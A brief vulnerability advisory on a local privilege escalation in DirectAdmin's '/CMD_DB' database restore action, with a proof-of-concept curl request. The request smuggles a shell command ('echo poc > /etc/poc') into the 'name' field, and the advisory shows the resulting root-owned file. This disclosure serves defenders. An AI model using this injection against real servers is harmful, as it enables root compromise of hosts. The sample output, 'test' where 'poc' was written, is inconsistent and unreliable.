DirectAdmin '/CMD_DB' Restore Action Local Privilege Escalation Vulnerability

DirectAdmin '/CMD_DB' Restore Action Local Privilege Escalation Vulnerability

To exploit this issue, attackers need local access and readily available tools.

The following example is available:

On client: curl -n -F action=restore -F domain=www.example.com <http://www.example.com>
-F 'file1=@database.gz' -F method=default -F 'name=poc_db;echo poc >
/etc/poc' http://www.example2.com:2222/CMD_DB
On server:
$ ls -la /etc/poc
-rw-r--r-- 1 root root 5 Apr 22 10:30 /etc/poc
$ cat /etc/poc
test